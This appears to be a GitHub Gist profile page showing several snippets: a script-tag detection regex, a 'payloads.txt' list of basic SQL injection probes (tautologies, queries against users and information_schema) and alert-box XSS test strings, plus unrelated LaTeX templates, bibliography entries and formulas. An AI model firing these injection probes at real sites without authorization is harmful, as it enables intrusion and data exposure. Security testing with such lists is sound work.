Skip to content

Instantly share code, notes, and snippets.

View Kremilly's full-sized avatar
🏳️‍⚧️
Work for building a better life

Kremilly Kremilly

🏳️‍⚧️
Work for building a better life
View GitHub Profile
(?i)<script.*?>.*?</script>
@Kremilly
Kremilly / payloads.txt
Created March 19, 2026 04:53
payloads.txt
' AND '1'='1
' AND '1'='2
' OR '1'='1
' OR '1'='2
' AND 1=1
' AND 1=2
' OR 1=1
' OR 1=2
' AND (SELECT COUNT(*) FROM users)>0
' AND (SELECT COUNT(*) FROM information_schema.tables)>10
<script>alert("Hello, world 1!")</script>
<script>alert("Hello, world 2!")</script>
<script>alert("Hello, world 3!")</script>
<script>alert("Hello, world 4!")</script>
<script>alert("Hello, world 5!")</script>
<script>alert("Hello, world 6!")</script>
<script>alert("Hello, world 7!")</script>
\documentclass[11pt,a4paper]{article}
\usepackage[utf8]{inputenc}
\usepackage{amsmath,amssymb,amsfonts}
\usepackage{booktabs}
\usepackage{listings}
\usepackage{geometry}
\usepackage{hyperref}
\usepackage{xcolor}
\geometry{margin=1in}
@book{knuth1986,
author = {Donald E. Knuth},
title = {The TeXbook},
year = {1986}
}
@article{lamport1994,
author = {Leslie Lamport},
title = {LaTeX: A Document Preparation System},
year = {1994}
\documentclass[11pt,a4paper]{article}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage[brazil]{babel}
\usepackage{amsmath,amssymb,amsfonts}
\usepackage{booktabs}
\usepackage{listings}
\usepackage{geometry}
\usepackage{hyperref}
\usepackage{xcolor}
$$
x = \frac{-b \pm \sqrt{b^2 - 4ac}}{2a}
$$
$$
f'(x) = \lim_{h \to 0} \frac{f(x+h) - f(x)}{h}
$$
$$
\int_{a}^{b} f(x) \, dx = F(b) - F(a)